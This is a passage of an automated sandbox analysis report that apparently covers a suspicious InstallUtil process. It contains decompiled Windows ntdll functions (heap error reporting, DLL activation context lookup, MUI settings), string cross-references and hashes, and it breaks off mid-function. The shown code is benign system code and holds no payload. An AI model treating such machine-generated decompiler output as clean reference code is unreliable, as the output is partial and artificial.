0x01381d98
0x01381d99
0x01381d7b
0x01381d90
0x01381d95
0x01381daa
0x01381db0
0x01381db1
0x01381db7
0x01381dc2
0x01381de1
0x01381de2
0x01381dc4
0x01381dd9
0x01381dde
0x01381df3
0x01381df9
0x01381dfa
0x01381e00
0x01381e0a
0x01381e13
0x01381e32
0x01381e33
0x01381e15
0x01381e2a
0x01381e2f
0x01381e39
0x01381e4a
0x01381e02
0x01381e02
0x01381e08
0x00000000
0x00000000
0x01381e08
0x01381e5b
0x01381e7a
0x01381e7b
0x01381e5d
0x01381e72
0x01381e77
0x01381e95

Strings

heap_failure_invalid_allocation_type, xrefs: 01381CB4
Parameter3: %p, xrefs: 01381DEE
heap_failure_usage_after_free, xrefs: 01381CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 01381CD7
Parameter2: %p, xrefs: 01381DA5
Error code: %d - %s, xrefs: 01381D12
HEAP[%wZ]: , xrefs: 01381C30, 01381CF7, 01381D42, 01381D8B, 01381DD4, 01381E25, 01381E6D
Parameter1: %p, xrefs: 01381D5C
heap_failure_invalid_argument, xrefs: 01381CAD
Last known valid blocks: before - %p, after - %p, xrefs: 01381E45
heap_failure_generic, xrefs: 01381C7C
Heap error detected at %p (heap handle %p), xrefs: 01381C50
heap_failure_unknown, xrefs: 01381C75
heap_failure_block_not_busy, xrefs: 01381CA6
heap_failure_internal, xrefs: 01381C6E
HEAP: , xrefs: 01381C16, 01381C3D, 01381D04, 01381D4F, 01381D98, 01381DE1, 01381E32, 01381E7A
heap_failure_buffer_underrun, xrefs: 01381C9F
heap_failure_multiple_entries_corruption, xrefs: 01381C8A
heap_failure_listentry_corruption, xrefs: 01381CD0
heap_failure_entry_corruption, xrefs: 01381C83
heap_failure_buffer_overrun, xrefs: 01381C98
heap_failure_virtual_block_corruption, xrefs: 01381C91
heap_failure_cross_heap_operation, xrefs: 01381CC2
heap_failure_freelists_corruption, xrefs: 01381CC9
Stack trace available at %p, xrefs: 01381E86

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: d8ee49fcc84b3ef58e1b133aa13f1779603173d00a5ebef451cae248867c7b5e
Instruction ID: 5b02b6fee8124c9dec4e034e6b1c95ae600a4bfb2a28bb758030eae57f646c79
Opcode Fuzzy Hash: d8ee49fcc84b3ef58e1b133aa13f1779603173d00a5ebef451cae248867c7b5e
Instruction Fuzzy Hash: C861E733631249DFD611BB49D4C5E7477BCEB04FB4B0A806EF60E9B701D6649C468B0A

Uniqueness

Uniqueness Score: -1.00%

Function 012F8E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E012F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x13bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x13b8464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x13b5780 & 0x00000003) != 0) {
							E01345510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x13b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0130B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x13b7984; // 0xe62b88
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x13b8464; // 0x761c0110
					 *0x13bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E012F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x13b5780 & 0x00000005) != 0) {
						_push(_t49);
						E01345510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x012f8e0f
0x012f8e16
0x012f8e19
0x012f8e1b
0x012f8e21
0x012f8e7f
0x012f8e85
0x01339354
0x0133936c
0x01339371
0x0133937b
0x01339381
0x01339381
0x0133937b
0x012f8e9d
0x012f8e9d
0x012f8e29
0x012f8e2c
0x012f8e38
0x012f8e3e
0x012f8e43
0x012f8eb5
0x012f8eb9
0x013392aa
0x013392af
0x013392e8
0x013392e8
0x013392af
0x012f8eb9
0x012f8e45
0x012f8e53
0x012f8e5b
0x012f8e5f
0x012f8e78
0x012f8e78
0x012f8e7d
0x012f8ec3
0x012f8ecd
0x012f8ed2
0x012f8ed2
0x012f8ec5
0x012f8ec5
0x00000000
0x012f8e7d
0x012f8e67
0x012f8ea4
0x0133931a
0x00000000
0x00000000
0x01339320
0x012f8ea4
0x012f8e70
0x01339325
0x01339340
0x01339345
0x01339345
0x012f8e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 012F8E53

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0133932A
Querying the active activation context failed with status 0x%08lx, xrefs: 01339357
minkernel\ntdll\ldrsnap.c, xrefs: 0133933B, 01339367
LdrpFindDllActivationContext, xrefs: 01339331, 0133935D

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 871d9ecb6a0fc3fca05494aa61fdb818e96ad5107b07b057004cd9500e823bb2
Instruction ID: 50700f20438361e120f651ecf0230d623be258a1edf9c68af96a679a706af892
Opcode Fuzzy Hash: 871d9ecb6a0fc3fca05494aa61fdb818e96ad5107b07b057004cd9500e823bb2
Instruction Fuzzy Hash: 53410932A30316DFEB36AE1C8C89B79F7A8AB44358F06417DFB5457152E7B05C808781

Uniqueness

Uniqueness Score: -1.00%

Function 012D3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E012D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E012D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E012D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E012D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E012D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E012D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L012E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0130F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01311370(_t276, 0x12a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0130BB40(0,  &_v68, _t170);
									if(L012D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0130BB40(_t257,  &_v68, _t243);
								if(L012D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01311370(_t278, 0x12a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L012E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0130F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01311370(_v16, 0x12a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0130BB40(_t262,  &_v68, _t244);
								if(L012D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01311370(_t282, 0x12a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0130BB40(_t262,  &_v68, _t201);
							if(L012D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L012E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0130F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01311370(_t280, 0x12a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0130BB40(_t267,  &_v68, _t245);
							if(L012D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01311370(_t284, 0x12a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0130BB40(_t267,  &_v68, _t224);
						if(L012D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x012d3d3c
0x012d3d42
0x012d3d44
0x012d3d46
0x012d3d49
0x012d3d4c
0x012d3d4f
0x012d3d52
0x012d3d55
0x012d3d58
0x012d3d5b
0x012d3d5f
0x012d3d61
0x012d3d66
0x01328213
0x01328218
0x012d4085
0x012d4088
0x012d408e
0x012d4094
0x012d409a
0x012d40a0
0x012d40a6
0x012d40a9
0x012d40af
0x012d40b6
0x012d40bd
0x012d40bd
0x012d3d83
0x0132821f
0x01328229
0x01328238
0x01328238
0x0132823d
0x0132823d
0x012d3da0
0x012d3daf
0x012d3db5
0x012d3dba
0x012d3dba
0x012d3dd4
0x012d3e94
0x012d3eab
0x012d3f6d
0x012d3f84
0x012d406b
0x012d406b
0x012d406e
0x012d406e
0x012d4070
0x012d4074
0x01328351
0x01328351
0x012d407a
0x012d407f
0x0132835d
0x01328370
0x01328377
0x01328379
0x0132837c
0x0132837c
0x0132835d
0x00000000
0x012d407f
0x012d3f8a
0x012d3f8d
0x012d3f90
0x012d3f95
0x0132830d
0x0132830f
0x012d3f9b
0x012d3fac
0x012d3fae
0x012d3fb1
0x012d3fb1
0x012d3fb6
0x01328317
0x0132831a
0x00000000
0x012d3fbc
0x012d3fc1
0x012d3fc9
0x012d3fd7
0x012d3fda
0x012d3fdd
0x012d4021
0x012d4021
0x012d4029
0x012d4030
0x012d4044
0x012d4046
0x012d4046
0x012d4044
0x012d4049
0x01328327
0x01328334
0x01328339
0x0132833c
0x012d404f
0x012d404f
0x012d404f
0x012d4051
0x012d4056
0x012d4063
0x012d4063
0x012d4068
0x00000000
0x012d4068
0x012d3fdf
0x012d3fe2
0x012d3fe4
0x012d3fe7
0x012d3fef
0x012d4003
0x012d4005
0x012d4005
0x012d400c
0x012d4013
0x012d4016
0x012d4017
0x012d401b
0x012d401e
0x00000000
0x012d401e
0x012d3fb6
0x012d3eb1
0x012d3eb4
0x012d3eb7
0x012d3ebc
0x013282a9
0x013282ab
0x012d3ec2
0x012d3ed3
0x012d3ed5
0x012d3ed8
0x012d3ed8
0x012d3edd
0x013282b3
0x013282b6
0x00000000
0x012d3ee3
0x012d3ee8
0x012d3eed
0x012d3ef0
0x012d3ef3
0x012d3f02
0x012d3f05
0x012d3f08
0x013282c0
0x013282c3
0x013282c5
0x013282c8
0x013282d0
0x013282e4
0x013282e6
0x013282e6
0x013282ed
0x013282f4
0x013282f7
0x013282f8
0x013282fc
0x013282ff
0x013282ff
0x012d3f0e
0x012d3f11
0x012d3f16
0x012d3f1d
0x012d3f31
0x01328307
0x01328307
0x012d3f31
0x012d3f39
0x012d3f48
0x012d3f4d
0x012d3f50
0x012d3f50
0x012d3f53
0x012d3f58
0x012d3f65
0x012d3f65
0x012d3f6a
0x00000000
0x012d3f6a
0x012d3edd
0x012d3dda
0x012d3ddd
0x012d3de0
0x012d3de5
0x01328245
0x012d3deb
0x012d3df7
0x012d3dfc
0x012d3dfe
0x012d3e01
0x012d3e01
0x012d3e06
0x0132824d
0x0132824f
0x01328254
0x00000000
0x012d3e0c
0x012d3e11
0x012d3e16
0x012d3e19
0x012d3e29
0x012d3e2c
0x012d3e2f
0x0132825c
0x0132825f
0x01328261
0x01328264
0x0132826c
0x01328280
0x01328282
0x01328282
0x01328289
0x01328290
0x01328293
0x01328294
0x01328298
0x0132829b
0x0132829b
0x012d3e35
0x012d3e38
0x012d3e3d
0x012d3e44
0x012d3e58
0x013282a3
0x013282a3
0x012d3e58
0x012d3e60
0x012d3e6f
0x012d3e74
0x012d3e77
0x012d3e77
0x012d3e7a
0x012d3e7f
0x012d3e8c
0x012d3e8c
0x012d3e91
0x00000000
0x012d3e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 012D3D8C
WindowsExcludedProcs, xrefs: 012D3D6F
Kernel-MUI-Language-SKU, xrefs: 012D3F70
Kernel-MUI-Language-Disallowed, xrefs: 012D3E97
Kernel-MUI-Language-Allowed, xrefs: 012D3DC0

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 17462d492c09d0aa2a2885f33dc685cf547cc290475e9329052a5986e636afcb
Instruction ID: d707a259e16189f81723f3f130e1e135243da738a75081713d4c646b812c06f7
Opcode Fuzzy Hash: 17462d492c09d0aa2a2885f33dc685cf547cc290475e9329052a5986e636afcb
Instruction Fuzzy Hash: 03F15F76D20659EFCB15EF98C980AEEBBF9FF08650F14006AE605E7650D7749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0139E824 Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0139E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x13bd360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L012EFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E012EFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x13bb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E012E2280(E0130F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E012DFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x13bb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0130B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E012FF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x13bb1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x13bb1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0139E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
